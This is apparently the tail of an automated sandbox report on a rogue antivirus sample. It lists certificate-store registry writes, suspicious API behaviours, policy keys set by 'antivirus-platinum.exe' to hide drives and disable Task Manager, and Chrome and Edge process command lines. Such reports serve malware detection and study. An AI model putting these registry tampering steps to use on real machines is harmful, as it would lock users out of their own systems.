4f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 5c000000010000000400000000080000190000000100000010000000d8b5fb368468620275d142ffd2aade370300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e56800000001000000000000007e000000010000000800000000c0032f2df8d6011d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3610b000000010000001200000056006500720069005300690067006e0000001400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331336200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c9040000000100000010000000cb17e431673ee209fe455793f30afa1c2000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa1400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f00b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e006700200043004100000009000000010000000c000000300a06082b0601050507030803000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd250f000000010000001000000065fc47520f66383962ec0b7b88a0821d190000000100000010000000e53d34cecb05c17ee332c749d78c02562000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 190000000100000010000000163bfe3a4cc2a862bfa2e635f8b2ee020f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce446090000000100000016000000301406082b0601050507030306082b06010505070304140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea0b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000177f789e96523e206c796917c848d50f7e0000000100000008000000000010c51e92d201680000000100000008000000000036044ddfd30103000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc20000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 5c000000010000000400000000040000040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc03000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b680000000100000008000000000036044ddfd3017e0000000100000008000000000010c51e92d2011d0000000100000010000000177f789e96523e206c796917c848d50f0b000000010000001200000056006500720069005300690067006e000000140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea090000000100000016000000301406082b0601050507030306082b06010505070304620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce4460f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5190000000100000010000000163bfe3a4cc2a862bfa2e635f8b2ee0220000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c00000001000000040000000008000019000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b0400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe\:SmartScreen:$DATA | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 757333.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 939845.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 487311.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 263289.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SYSTEM | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DISABLETASKMGR = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DISABLETASKMGR = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f3ff9758,0x7ff8f3ff9768,0x7ff8f3ff9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2760 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2768 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5000 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4132 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5400 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4600 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5872 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6032 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5592 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3116 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6116 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5924 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5088 --field-trial-handle=1868,i,10732171060503736770,2931806849781833158,131072 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
